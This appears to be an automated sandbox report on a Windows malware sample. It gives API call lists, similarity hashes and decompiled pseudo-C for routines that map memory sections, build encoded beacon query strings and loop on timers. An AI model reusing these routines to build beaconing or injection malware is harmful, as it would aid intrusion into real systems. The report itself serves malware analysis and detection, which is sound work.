Associated: 00000002.00000002.1180355733.0000000000A70000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.1180418644.0000000000A79000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.1180445094.0000000000A7A000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.1180468302.0000000000A7C000.00000002.00020000.sdmp Download File

Similarity

API ID: Token$CloseInformationOpenProcessQuery$AllocateHeapmemcpy
String ID:
API String ID: 2575439697-0
Opcode ID: 5899515d0a300da4b1869a59de47dac7e5a9c3da987ce320648997bd6c2d99aa
Instruction ID: 9e055ab9cd2ccfbb5d1e06bb0fda447e92fb22fe9e6573bb4ef6c5e2508339fa
Opcode Fuzzy Hash: 5899515d0a300da4b1869a59de47dac7e5a9c3da987ce320648997bd6c2d99aa
Instruction Fuzzy Hash: 572103B2900218BBDF11DFA5CD45ADEBFBDEB08740F108026F909E6120D7B18A55DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 6E0518D1, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 70
nativeCOMMON

Download Yara Rule

C-Code - Quality: 72%

			E6E0518D1(intOrPtr* __eax, void** _a4) {
				int _v12;
				void* _v16;
				void* _v20;
				void* _v24;
				int _v28;
				int _v32;
				intOrPtr _v36;
				int _v40;
				int _v44;
				void* _v48;
				void* __esi;
				long _t34;
				void* _t39;
				void* _t47;
				intOrPtr* _t48;

				_t48 = __eax;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_v24 =  *((intOrPtr*)(__eax + 4));
				_v16 = 0;
				_v12 = 0;
				_v48 = 0x18;
				_v44 = 0;
				_v36 = 0x40;
				_v40 = 0;
				_v32 = 0;
				_v28 = 0;
				_t34 = NtCreateSection( &_v16, 0xf001f,  &_v48,  &_v24,  *(__eax + 8), 0x8000000, 0);
				if(_t34 < 0) {
					_t47 =  *((intOrPtr*)(_t48 + 0x18))(_t34);
				} else {
					 *_t48 = _v16;
					_t39 = E6E051B89(_t48,  &_v12); // executed
					_t47 = _t39;
					if(_t47 != 0) {
						 *((intOrPtr*)(_t48 + 0x1c))(_v16);
					} else {
						memset(_v12, 0, _v24);
						 *_a4 = _v12;
					}
				}
				return _t47;
			}

APIs

NtCreateSection.NTDLL(00000002,000F001F,?,?,?,08000000,00000000,73B74EE0,00000000,00000000,?), ref: 6E05192E

Part of subcall function 6E051B89: NtMapViewOfSection.NTDLL(00000000,000000FF,?,00000000,00000000,?,6E051943,00000002,00000000,?,?,00000000,?,?,6E051943,00000000), ref: 6E051BB6

memset.NTDLL ref: 6E051950

Strings

@, xrefs: 6E05191E

Memory Dump Source

Source File: 00000002.00000002.1182842141.000000006E051000.00000020.00020000.sdmp, Offset: 6E050000, based on PE: true

Associated: 00000002.00000002.1182812116.000000006E050000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.1182861845.000000006E053000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.1182891522.000000006E055000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.1182918406.000000006E056000.00000002.00020000.sdmp Download File

Similarity

API ID: Section$CreateViewmemset
String ID: @
API String ID: 2533685722-2766056989
Opcode ID: 00af36b428359ca772932176b9c6d2f97bd417452e06b8a4b42cf2ee787d1e4b
Instruction ID: 4068907e4665e92758692dde8dee57a7983b644cc90d518faf290848c2be52b7
Opcode Fuzzy Hash: 00af36b428359ca772932176b9c6d2f97bd417452e06b8a4b42cf2ee787d1e4b
Instruction Fuzzy Hash: 3A210BB1D00609EFDB01CFE9C884ADEFBB9EF48354F508429E505F3210D730AA588BA4

Uniqueness

Uniqueness Score: -1.00%

Function 6E051566, Relevance: 4.5, APIs: 3, Instructions: 23
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E6E051566(void* __ecx) {
				char _v8;
				signed short _t7;

				_v8 = _v8 & 0x00000000;
				_t7 = GetLocaleInfoA(0x400, 0x5a,  &_v8, 4); // executed
				if(_t7 == 0) {
					__imp__GetSystemDefaultUILanguage();
					VerLanguageNameA(_t7 & 0xffff,  &_v8, 4);
				}
				return _v8;
			}

0x6e05156a
0x6e05157b
0x6e051583
0x6e051585
0x6e051598
0x6e051598
0x6e0515a2

APIs

GetLocaleInfoA.KERNELBASE(00000400,0000005A,00000000,00000004,?,?,6E051C5E,?,6E051810,?,00000000,00000000,?,?,?,6E051810), ref: 6E05157B
GetSystemDefaultUILanguage.KERNEL32(?,?,6E051C5E,?,6E051810,?,00000000,00000000,?,?,?,6E051810), ref: 6E051585
VerLanguageNameA.KERNEL32(?,00000000,00000004,?,?,6E051C5E,?,6E051810,?,00000000,00000000,?,?,?,6E051810), ref: 6E051598

Memory Dump Source

Source File: 00000002.00000002.1182842141.000000006E051000.00000020.00020000.sdmp, Offset: 6E050000, based on PE: true

Associated: 00000002.00000002.1182812116.000000006E050000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.1182861845.000000006E053000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.1182891522.000000006E055000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.1182918406.000000006E056000.00000002.00020000.sdmp Download File

Similarity

API ID: Language$DefaultInfoLocaleNameSystem
String ID:
API String ID: 3724080410-0
Opcode ID: 27c2a0a0a1e0281b0c74014c6bf814840f39e2f0b9c9c23a7a81d5b8878b7861
Instruction ID: de5faab829ae3d30bad3af8dc5aa8a4f7bafe5a72591d950d2fdc314551fc97e
Opcode Fuzzy Hash: 27c2a0a0a1e0281b0c74014c6bf814840f39e2f0b9c9c23a7a81d5b8878b7861
Instruction Fuzzy Hash: 0DE04878640704F6E700DBD1DD0AFBD73BC970474AF500044F701D61C0D6749A08D725

Uniqueness

Uniqueness Score: -1.00%

Function 6E051B89, Relevance: 1.5, APIs: 1, Instructions: 34
nativeCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E6E051B89(void** __esi, PVOID* _a4) {
				long _v8;
				void* _v12;
				void* _v16;
				long _t13;

				_v16 = 0;
				asm("stosd");
				_v8 = 0;
				_t13 = NtMapViewOfSection( *__esi, 0xffffffff, _a4, 0, 0,  &_v16,  &_v8, 2, 0, __esi[2]);
				if(_t13 < 0) {
					_push(_t13);
					return __esi[6]();
				}
				return 0;
			}

0x6e051b9b
0x6e051ba1
0x6e051baf
0x6e051bb6
0x6e051bbb
0x6e051bc1
0x00000000
0x6e051bc2
0x00000000

APIs

NtMapViewOfSection.NTDLL(00000000,000000FF,?,00000000,00000000,?,6E051943,00000002,00000000,?,?,00000000,?,?,6E051943,00000000), ref: 6E051BB6

Memory Dump Source

Source File: 00000002.00000002.1182842141.000000006E051000.00000020.00020000.sdmp, Offset: 6E050000, based on PE: true

Associated: 00000002.00000002.1182812116.000000006E050000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.1182861845.000000006E053000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.1182891522.000000006E055000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.1182918406.000000006E056000.00000002.00020000.sdmp Download File

Similarity

API ID: SectionView
String ID:
API String ID: 1323581903-0
Opcode ID: 5dd26fff624a50198c0bd826f45a2e4ef6e885f587514f0e64cb0fed618db76f
Instruction ID: b8043cd67e4f7375274e169b54344a73b6dc827e4867957181891c157c15ac2c
Opcode Fuzzy Hash: 5dd26fff624a50198c0bd826f45a2e4ef6e885f587514f0e64cb0fed618db76f
Instruction Fuzzy Hash: DAF012B590060DFFEB119FA5CC89D9FBBFDEB44354B104939B552E2190E6309E189B60

Uniqueness

Uniqueness Score: -1.00%

Function 00A76DB7, Relevance: 40.5, APIs: 22, Strings: 1, Instructions: 263
memorystringCOMMON

Download Yara Rule

C-Code - Quality: 77%

			E00A76DB7(long __eax, void* __ecx, void* __edx, intOrPtr _a4, void* _a8, char** _a12, int* _a16, signed int _a20) {
				void* _v8;
				void* _v12;
				void* _v16;
				void* _v20;
				void* __ebx;
				void* __edi;
				long _t63;
				intOrPtr _t64;
				intOrPtr _t65;
				intOrPtr _t66;
				intOrPtr _t67;
				intOrPtr _t68;
				void* _t71;
				intOrPtr _t72;
				int _t75;
				void* _t76;
				intOrPtr _t77;
				intOrPtr _t81;
				intOrPtr _t85;
				intOrPtr _t86;
				void* _t88;
				void* _t91;
				intOrPtr _t95;
				intOrPtr _t99;
				intOrPtr* _t101;
				void* _t102;
				void* _t107;
				intOrPtr _t112;
				signed int _t116;
				char** _t118;
				int _t121;
				signed int _t123;
				intOrPtr* _t124;
				intOrPtr* _t126;
				intOrPtr* _t128;
				intOrPtr* _t130;
				intOrPtr _t133;
				intOrPtr _t136;
				int _t139;
				intOrPtr _t140;
				int _t143;
				void* _t144;
				void* _t145;
				void* _t155;
				int _t158;
				void* _t159;
				void* _t160;
				void* _t161;
				intOrPtr _t162;
				void* _t164;
				long _t168;
				intOrPtr* _t169;
				intOrPtr* _t172;
				void* _t173;
				void* _t175;
				void* _t176;
				void* _t181;

				_t155 = __edx;
				_t145 = __ecx;
				_t63 = __eax;
				_t144 = _a20;
				_a20 = 8;
				if(__eax == 0) {
					_t63 = GetTickCount();
				}
				_t64 =  *0xa7a018; // 0x785c6176
				asm("bswap eax");
				_t65 =  *0xa7a014; // 0x5cb11ae7
				asm("bswap eax");
				_t66 =  *0xa7a010; // 0x15dc9586
				asm("bswap eax");
				_t67 =  *0xa7a00c; // 0x67522d90
				asm("bswap eax");
				_t68 =  *0xa7a2d0; // 0x4aed5a8
				_t3 = _t68 + 0xa7b622; // 0x74666f73
				_t158 = wsprintfA(_t144, _t3, 3, 0x3d14c, _t67, _t66, _t65, _t64,  *0xa7a02c,  *0xa7a004, _t63);
				_t71 = E00A7271A();
				_t72 =  *0xa7a2d0; // 0x4aed5a8
				_t4 = _t72 + 0xa7b662; // 0x74707526
				_t75 = wsprintfA(_t158 + _t144, _t4, _t71);
				_t175 = _t173 + 0x38;
				_t159 = _t158 + _t75;
				if(_a8 != 0) {
					_t140 =  *0xa7a2d0; // 0x4aed5a8
					_t8 = _t140 + 0xa7b66d; // 0x732526
					_t143 = wsprintfA(_t159 + _t144, _t8, _a8);
					_t175 = _t175 + 0xc;
					_t159 = _t159 + _t143;
				}
				_t76 = E00A72956(_t145);
				_t77 =  *0xa7a2d0; // 0x4aed5a8
				_t10 = _t77 + 0xa7b38a; // 0x6d697426
				_t160 = _t159 + wsprintfA(_t159 + _t144, _t10, _t76, _t155);
				_t81 =  *0xa7a2d0; // 0x4aed5a8
				_t12 = _t81 + 0xa7b7b4; // 0x5568d5c
				_t181 = _a4 - _t12;
				_t14 = _t81 + 0xa7b33b; // 0x74636126
				_t157 = 0 | _t181 == 0x00000000;
				_t161 = _t160 + wsprintfA(_t160 + _t144, _t14, _t181 == 0);
				_t85 =  *0xa7a318; // 0x55695e0
				_t176 = _t175 + 0x1c;
				if(_t85 != 0) {
					_t136 =  *0xa7a2d0; // 0x4aed5a8
					_t18 = _t136 + 0xa7b8ea; // 0x3d736f26
					_t139 = wsprintfA(_t161 + _t144, _t18, _t85);
					_t176 = _t176 + 0xc;
					_t161 = _t161 + _t139;
				}
				_t86 =  *0xa7a328; // 0x55695b0
				if(_t86 != 0) {
					_t133 =  *0xa7a2d0; // 0x4aed5a8
					_t20 = _t133 + 0xa7b685; // 0x73797326
					wsprintfA(_t161 + _t144, _t20, _t86);
					_t176 = _t176 + 0xc;
				}
				_t162 =  *0xa7a37c; // 0x5569630
				_t88 = E00A75741(0xa7a00a, _t162 + 4);
				_t168 = 0;
				_v12 = _t88;
				if(_t88 == 0) {
					L28:
					RtlFreeHeap( *0xa7a290, _t168, _t144); // executed
					return _a20;
				} else {
					_t91 = RtlAllocateHeap( *0xa7a290, 0, 0x800);
					_a8 = _t91;
					if(_t91 == 0) {
						L27:
						HeapFree( *0xa7a290, _t168, _v12);
						goto L28;
					}
					E00A71A51(GetTickCount());
					_t95 =  *0xa7a37c; // 0x5569630
					__imp__(_t95 + 0x40);
					asm("lock xadd [eax], ecx");
					_t99 =  *0xa7a37c; // 0x5569630
					__imp__(_t99 + 0x40);
					_t101 =  *0xa7a37c; // 0x5569630
					_t102 = E00A75AE3(1, _t157, _t144,  *_t101); // executed
					_t164 = _t102;
					_v20 = _t164;
					asm("lock xadd [eax], ecx");
					if(_t164 == 0) {
						L26:
						RtlFreeHeap( *0xa7a290, _t168, _a8); // executed
						goto L27;
					}
					StrTrimA(_t164, 0xa792cc);
					_push(_t164);
					_t107 = E00A72829();
					_v8 = _t107;
					if(_t107 == 0) {
						L25:
						RtlFreeHeap( *0xa7a290, _t168, _t164); // executed
						goto L26;
					}
					 *_t164 = 0;
					__imp__(_a8, _v12);
					_t169 = __imp__;
					 *_t169(_a8, _v8);
					 *_t169(_a8, _t164);
					_t112 = E00A733FA(0, _a8);
					_a4 = _t112;
					if(_t112 == 0) {
						_a20 = 8;
						L23:
						E00A72813();
						L24:
						RtlFreeHeap( *0xa7a290, 0, _v8); // executed
						_t168 = 0;
						goto L25;
					}
					_t116 = E00A75C63(_t144, 0xffffffffffffffff, _t164,  &_v16); // executed
					_a20 = _t116;
					if(_t116 == 0) {
						_t172 = _v16;
						_t123 = E00A71671(_t172, _a4, _a12, _a16); // executed
						_a20 = _t123;
						_t124 =  *((intOrPtr*)(_t172 + 8));
						 *((intOrPtr*)( *_t124 + 0x80))(_t124);
						_t126 =  *((intOrPtr*)(_t172 + 8));
						 *((intOrPtr*)( *_t126 + 8))(_t126);
						_t128 =  *((intOrPtr*)(_t172 + 4));
						 *((intOrPtr*)( *_t128 + 8))(_t128);
						_t130 =  *_t172;
						 *((intOrPtr*)( *_t130 + 8))(_t130);
						E00A72A03(_t172);
					}
					if(_a20 != 0x10d2) {
						L18:
						if(_a20 == 0) {
							_t118 = _a12;
							if(_t118 != 0) {
								_t165 =  *_t118;
								_t170 =  *_a16;
								wcstombs( *_t118,  *_t118,  *_a16);
								_t121 = E00A76459(_t165, _t165, _t170 >> 1);
								_t164 = _v20;
								 *_a16 = _t121;
							}
						}
						goto L21;
					} else {
						if(_a12 != 0) {
							L21:
							E00A72A03(_a4);
							if(_a20 == 0 || _a20 == 0x10d2) {
								goto L24;
							} else {
								goto L23;
							}
						}
						_a20 = _a20 & 0x00000000;
						goto L18;
					}
				}
			}

0x00a76db7
0x00a76db7
0x00a76db7
0x00a76dc0
0x00a76dc5
0x00a76dcc
0x00a76dce
0x00a76dce
0x00a76ddb
0x00a76de6
0x00a76de9
0x00a76df4
0x00a76df7
0x00a76dfc
0x00a76dff
0x00a76e04
0x00a76e07
0x00a76e13
0x00a76e20
0x00a76e22
0x00a76e28
0x00a76e2d
0x00a76e38
0x00a76e3a
0x00a76e3d
0x00a76e43
0x00a76e45
0x00a76e4d
0x00a76e58
0x00a76e5a
0x00a76e5d
0x00a76e5d
0x00a76e5f
0x00a76e66
0x00a76e6b
0x00a76e78
0x00a76e7a
0x00a76e7f
0x00a76e87
0x00a76e8a
0x00a76e90
0x00a76e9b
0x00a76e9d
0x00a76ea2
0x00a76ea7
0x00a76eaa
0x00a76eaf
0x00a76eba
0x00a76ebc
0x00a76ebf
0x00a76ebf
0x00a76ec1
0x00a76ec8
0x00a76ecb
0x00a76ed0
0x00a76eda
0x00a76edc
0x00a76edc
0x00a76edf
0x00a76eed
0x00a76ef2
0x00a76ef6
0x00a76ef9
0x00a770c5
0x00a770cd
0x00a770da
0x00a76eff
0x00a76f0b
0x00a76f13
0x00a76f16
0x00a770b5
0x00a770bf
0x00000000
0x00a770bf
0x00a76f22
0x00a76f27
0x00a76f30
0x00a76f41
0x00a76f45
0x00a76f4e
0x00a76f54
0x00a76f5c
0x00a76f61
0x00a76f68
0x00a76f71
0x00a76f77
0x00a770a5
0x00a770af
0x00000000
0x00a770af
0x00a76f83
0x00a76f89
0x00a76f8a
0x00a76f91
0x00a76f94
0x00a77097
0x00a7709f
0x00000000
0x00a7709f
0x00a76f9d
0x00a76fa3
0x00a76fac
0x00a76fb5
0x00a76fbb
0x00a76fc2
0x00a76fc9
0x00a76fcc
0x00a770dd
0x00a7707f
0x00a7707f
0x00a77084
0x00a7708f
0x00a77095
0x00000000
0x00a77095
0x00a76fd6
0x00a76fdd
0x00a76fe0
0x00a76fe5
0x00a76ff0
0x00a76ff5
0x00a76ff8
0x00a76ffe
0x00a77004
0x00a7700a
0x00a7700d
0x00a77013
0x00a77016
0x00a7701b
0x00a7701f
0x00a7701f
0x00a7702b
0x00a77037
0x00a7703b
0x00a7703d
0x00a77042
0x00a77044
0x00a77049
0x00a7704e
0x00a7705b
0x00a77063
0x00a77066
0x00a77066
0x00a77042
0x00000000
0x00a7702d
0x00a77031
0x00a77068
0x00a7706b
0x00a77074
0x00000000
0x00000000
0x00000000
0x00000000
0x00a77074
0x00a77033
0x00000000
0x00a77033
0x00a7702b

APIs

GetTickCount.KERNEL32 ref: 00A76DCE
wsprintfA.USER32 ref: 00A76E1B
wsprintfA.USER32 ref: 00A76E38
wsprintfA.USER32 ref: 00A76E58
wsprintfA.USER32 ref: 00A76E76
wsprintfA.USER32 ref: 00A76E99
wsprintfA.USER32 ref: 00A76EBA
wsprintfA.USER32 ref: 00A76EDA
RtlAllocateHeap.NTDLL(00000000,00000800), ref: 00A76F0B
GetTickCount.KERNEL32 ref: 00A76F1C
RtlEnterCriticalSection.NTDLL(055695F0), ref: 00A76F30
RtlLeaveCriticalSection.NTDLL(055695F0), ref: 00A76F4E

Part of subcall function 00A75AE3: lstrlen.KERNEL32(00000000,00000000,253D7325,00000000,00000000,?,00000000,00A76301,00000000,05569630), ref: 00A75B0E
Part of subcall function 00A75AE3: lstrlen.KERNEL32(00000000,?,00000000,00A76301,00000000,05569630), ref: 00A75B16
Part of subcall function 00A75AE3: strcpy.NTDLL ref: 00A75B2D
Part of subcall function 00A75AE3: lstrcat.KERNEL32(00000000,00000000), ref: 00A75B38
Part of subcall function 00A75AE3: StrTrimA.SHLWAPI(00000000,=,00000000,00000000,00A76301,?,00000000,00A76301,00000000,05569630), ref: 00A75B55

StrTrimA.SHLWAPI(00000000,00A792CC,?,05569630), ref: 00A76F83

Part of subcall function 00A72829: lstrlen.KERNEL32(0556887A,00000000,00000000,00000000,00A76328,00000000), ref: 00A72839
Part of subcall function 00A72829: lstrlen.KERNEL32(?), ref: 00A72841
Part of subcall function 00A72829: lstrcpy.KERNEL32(00000000,0556887A), ref: 00A72855
Part of subcall function 00A72829: lstrcat.KERNEL32(00000000,?), ref: 00A72860

lstrcpy.KERNEL32(00000000,?), ref: 00A76FA3
lstrcat.KERNEL32(00000000,?), ref: 00A76FB5
lstrcat.KERNEL32(00000000,00000000), ref: 00A76FBB

Part of subcall function 00A733FA: lstrlen.KERNEL32(?,00A7A380,73BB7FC0,00000000,00A72788,?,?,?,?,?,00A73EAC,?), ref: 00A73403
Part of subcall function 00A733FA: mbstowcs.NTDLL ref: 00A7342A
Part of subcall function 00A733FA: memset.NTDLL ref: 00A7343C

wcstombs.NTDLL ref: 00A7704E

Part of subcall function 00A71671: SysAllocString.OLEAUT32(00000000), ref: 00A716B2
Part of subcall function 00A71671: IUnknown_QueryInterface_Proxy.RPCRT4(00000008,332C4425,00000000), ref: 00A71734
Part of subcall function 00A71671: StrStrIW.SHLWAPI(00000000,006E0069), ref: 00A71773

Part of subcall function 00A72A03: HeapFree.KERNEL32(00000000,00000000,00A74072,00000000,?,?,00000000,?,?,?,?,?,?,00A744AE,00000000), ref: 00A72A0F

RtlFreeHeap.NTDLL(00000000,?,00000000), ref: 00A7708F
RtlFreeHeap.NTDLL(00000000,00000000,00000000), ref: 00A7709F
RtlFreeHeap.NTDLL(00000000,00000000,?,05569630), ref: 00A770AF
HeapFree.KERNEL32(00000000,?), ref: 00A770BF
RtlFreeHeap.NTDLL(00000000,?), ref: 00A770CD

Strings

va\x, xrefs: 00A76DDB

Memory Dump Source

Source File: 00000002.00000002.1180379549.0000000000A71000.00000020.00020000.sdmp, Offset: 00A70000, based on PE: true

Associated: 00000002.00000002.1180355733.0000000000A70000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.1180418644.0000000000A79000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.1180445094.0000000000A7A000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.1180468302.0000000000A7C000.00000002.00020000.sdmp Download File

Similarity

API ID: Heapwsprintf$Free$lstrlen$lstrcat$CountCriticalSectionTickTrimlstrcpy$AllocAllocateEnterInterface_LeaveProxyQueryStringUnknown_mbstowcsmemsetstrcpywcstombs
String ID: va\x
API String ID: 2871901346-1859480093
Opcode ID: d70199d8e10a2d2e95250175f7a506df011e43e39fe0c0ef7cba6a7f1569113e
Instruction ID: 27aa421940a59852397b7d35bf91fe29b552a186387aa12b1cc740a83d645b07
Opcode Fuzzy Hash: d70199d8e10a2d2e95250175f7a506df011e43e39fe0c0ef7cba6a7f1569113e
Instruction Fuzzy Hash: CDA13871500219AFDB11DFA8DC89EAE3BA9FF98350F14C425F80DD7261DB319992CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 6E064800, Relevance: 21.5, APIs: 5, Strings: 7, Instructions: 507windowCOMMON

Download Yara Rule

APIs

FindFirstChangeNotificationW.KERNELBASE(6E097670,00000001,00000040), ref: 6E064885
LoadIconW.USER32(00000000,00007F01), ref: 6E0648E8
FindFirstChangeNotificationW.KERNELBASE(6E09767C,00000001,00000008), ref: 6E064A56

Strings

8n, xrefs: 6E064CD6
8n, xrefs: 6E064E05
8n, xrefs: 6E0649EA
Hn, xrefs: 6E064E69
Xn, xrefs: 6E064AA5
Xn, xrefs: 6E064962
n, xrefs: 6E064E9E

Memory Dump Source

Source File: 00000002.00000002.1182968404.000000006E05E000.00000020.00020000.sdmp, Offset: 6E05E000, based on PE: false

Similarity

API ID: ChangeFindFirstNotification$IconLoad
String ID: n$8n$8n$8n$Hn$Xn$Xn
API String ID: 2944710551-1746711009
Opcode ID: 74615b0fd95075c5500d78d91a654ae5c088b9483d44594a22a707b133a517dc
Instruction ID: acc7cb7fa391fc89751ac312106f52c5dffe102a73241e06447973bcf2392f78
Opcode Fuzzy Hash: 74615b0fd95075c5500d78d91a654ae5c088b9483d44594a22a707b133a517dc
Instruction Fuzzy Hash: 5C12AD71A08A11EFDF44CF68C9AC3693BE1F786715F05A62EE48487385D7349C478B92

Uniqueness

Uniqueness Score: -1.00%

Function 00A71B47, Relevance: 16.6, APIs: 11, Instructions: 149
timememoryCOMMON

Download Yara Rule

C-Code - Quality: 83%

			E00A71B47(intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
				struct %anon52 _v8;
				long _v12;
				char _v16;
				char _v20;
				signed int _v24;
				intOrPtr _v32;
				union _LARGE_INTEGER _v36;
				intOrPtr _v40;
				void* _v44;
				void _v88;
				char _v92;
				struct %anon52 _t46;
				intOrPtr _t51;
				long _t53;
				void* _t54;
				struct %anon52 _t61;
				long _t65;
				signed int _t66;
				void* _t69;
				void* _t71;
				signed int _t72;
				intOrPtr _t74;
				intOrPtr _t76;
				void** _t78;
				void* _t80;

				_t74 = __edx;
				_v92 = 0;
				memset( &_v88, 0, 0x2c);
				_t46 = CreateWaitableTimerA(0, 1, 0);
				_v44 = _t46;
				if(_t46 == 0) {
					_v8.LowPart = GetLastError();
				} else {
					_push(0xffffffff);
					_push(0xff676980);
					_push(0);
					_push( *0xa7a298);
					_v20 = 0;
					_v16 = 0;
					L00A77F56();
					_v36.LowPart = _t46;
					_v32 = _t74;
					SetWaitableTimer(_v44,  &_v36, 0, 0, 0, 0);
					_t51 =  *0xa7a2c4; // 0x2d0
					_v40 = _t51;
					_t53 = WaitForMultipleObjects(2,  &_v44, 0, 0xffffffff);
					_v8.LowPart = _t53;
					if(_t53 == 0) {
						if(_a8 != 0) {
							L4:
							 *0xa7a2a4 = 5;
						} else {
							_t69 = E00A74A3C(_t74); // executed
							if(_t69 != 0) {
								goto L4;
							}
						}
						_v12 = 0;
						L6:
						L6:
						if(_v12 == 1 && ( *0xa7a2b8 & 0x00000001) == 0) {
							_v12 = 2;
						}
						_t72 = _v12;
						_t58 = _t72 << 4;
						_t76 = _t80 + (_t72 << 4) - 0x54;
						_t73 = _t72 + 1;
						_v24 = _t72 + 1;
						_t61 = E00A7243C( &_v20, _t73, _t73, _t80 + _t58 - 0x58, _t76,  &_v16); // executed
						_v8.LowPart = _t61;
						if(_t61 != 0) {
							goto L17;
						}
						_t66 = _v24;
						_t90 = _t66 - 3;
						_v12 = _t66;
						if(_t66 != 3) {
							goto L6;
						} else {
							_v8.LowPart = E00A77289(_t73, _t90,  &_v92, _a4, _a8);
						}
						goto L12;
						L17:
						__eflags = _t61 - 0x10d2;
						if(_t61 != 0x10d2) {
							_push(0xffffffff);
							_push(0xff676980);
							_push(0);
							_push( *0xa7a29c);
							goto L21;
						} else {
							__eflags =  *0xa7a2a0; // 0xa
							if(__eflags == 0) {
								goto L12;
							} else {
								_t61 = E00A72813();
								_push(0xffffffff);
								_push(0xdc3cba00);
								_push(0);
								_push( *0xa7a2a0);
								L21:
								L00A77F56();
								_v36.LowPart = _t61;
								_v32 = _t76;
								SetWaitableTimer(_v44,  &_v36, 0, 0, 0, 0); // executed
								_t65 = WaitForMultipleObjects(2,  &_v44, 0, 0xffffffff);
								__eflags = _t65;
								_v8.LowPart = _t65;
								if(_t65 == 0) {
									goto L6;
								} else {
									goto L12;
								}
							}
						}
						L25:
					}
					L12:
					_t78 =  &_v92;
					_t71 = 3;
					do {
						_t54 =  *_t78;
						if(_t54 != 0) {
							HeapFree( *0xa7a290, 0, _t54);
						}
						_t78 =  &(_t78[4]);
						_t71 = _t71 - 1;
					} while (_t71 != 0);
					CloseHandle(_v44);
				}
				return _v8;
				goto L25;
			}

0x00a71b47
0x00a71b59
0x00a71b5c
0x00a71b68
0x00a71b70
0x00a71b73
0x00a71cd9
0x00a71b79
0x00a71b79
0x00a71b7b
0x00a71b80
0x00a71b81
0x00a71b87
0x00a71b8a
0x00a71b8d
0x00a71b9b
0x00a71ba6
0x00a71ba9
0x00a71bab
0x00a71bb8
0x00a71bc2
0x00a71bc6
0x00a71bc9
0x00a71bce
0x00a71bd9
0x00a71bd9
0x00a71bd0
0x00a71bd0
0x00a71bd7
0x00000000
0x00000000
0x00a71bd7
0x00a71be3
0x00000000
0x00a71be6
0x00a71bea
0x00a71bf5
0x00a71bf5
0x00a71bfc
0x00a71c01
0x00a71c08
0x00a71c11
0x00a71c17
0x00a71c1a
0x00a71c21
0x00a71c24
0x00000000
0x00000000
0x00a71c26
0x00a71c29
0x00a71c2c
0x00a71c2f
0x00000000
0x00a71c31
0x00a71c40
0x00a71c40
0x00000000
0x00a71c6e
0x00a71c6e
0x00a71c73
0x00a71c92
0x00a71c94
0x00a71c99
0x00a71c9a
0x00000000
0x00a71c75
0x00a71c75
0x00a71c7b
0x00000000
0x00a71c7d
0x00a71c7d
0x00a71c82
0x00a71c84
0x00a71c89
0x00a71c8a
0x00a71ca0
0x00a71ca0
0x00a71ca8
0x00a71cb3
0x00a71cb6
0x00a71cc1
0x00a71cc3
0x00a71cc5
0x00a71cc8
0x00000000
0x00a71cce
0x00000000
0x00a71cce
0x00a71cc8
0x00a71c7b
0x00000000
0x00a71c73
0x00a71c43
0x00a71c45
0x00a71c48
0x00a71c49
0x00a71c49
0x00a71c4d
0x00a71c57
0x00a71c57
0x00a71c5d
0x00a71c60
0x00a71c60
0x00a71c66
0x00a71c66
0x00a71ce3
0x00000000

APIs

memset.NTDLL ref: 00A71B5C
CreateWaitableTimerA.KERNEL32(00000000,00000001,00000000), ref: 00A71B68
_allmul.NTDLL(00000000,FF676980,000000FF), ref: 00A71B8D
SetWaitableTimer.KERNELBASE(?,?,00000000,00000000,00000000,00000000), ref: 00A71BA9
WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 00A71BC2
HeapFree.KERNEL32(00000000,00000000), ref: 00A71C57
CloseHandle.KERNEL32(?), ref: 00A71C66
_allmul.NTDLL(00000000,FF676980,000000FF,00000002), ref: 00A71CA0
SetWaitableTimer.KERNELBASE(?,?,00000000,00000000,00000000,00000000,00000000,FF676980,000000FF,00000002,?,?,00A72F7D), ref: 00A71CB6
WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 00A71CC1

Part of subcall function 00A74A3C: StrToIntExW.SHLWAPI(?,00000000,?,?,004F0053,05569338,00000000,?,73BCF710,00000000,73BCF730), ref: 00A74A8B
Part of subcall function 00A74A3C: HeapFree.KERNEL32(00000000,00000000,?,80000001,00000000,00680043,05569370,?,00000000,30314549,00000014,004F0053,0556932C), ref: 00A74B28
Part of subcall function 00A74A3C: HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,00A71BD5), ref: 00A74B3A

GetLastError.KERNEL32 ref: 00A71CD3

Memory Dump Source

Source File: 00000002.00000002.1180379549.0000000000A71000.00000020.00020000.sdmp, Offset: 00A70000, based on PE: true

Associated: 00000002.00000002.1180355733.0000000000A70000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.1180418644.0000000000A79000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.1180445094.0000000000A7A000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.1180468302.0000000000A7C000.00000002.00020000.sdmp Download File

Similarity

API ID: FreeHeapTimerWaitable$MultipleObjectsWait_allmul$CloseCreateErrorHandleLastmemset
String ID:
API String ID: 3521023985-0
Opcode ID: f337bca36d45c3bca38a5a7a546f6371619706cc2b1d164a9290d334f9c92a68
Instruction ID: 44b6528d71895fdb75e79be9ea10aa97843e5b682a79f4c52594ef1f87a3b186
Opcode Fuzzy Hash: f337bca36d45c3bca38a5a7a546f6371619706cc2b1d164a9290d334f9c92a68
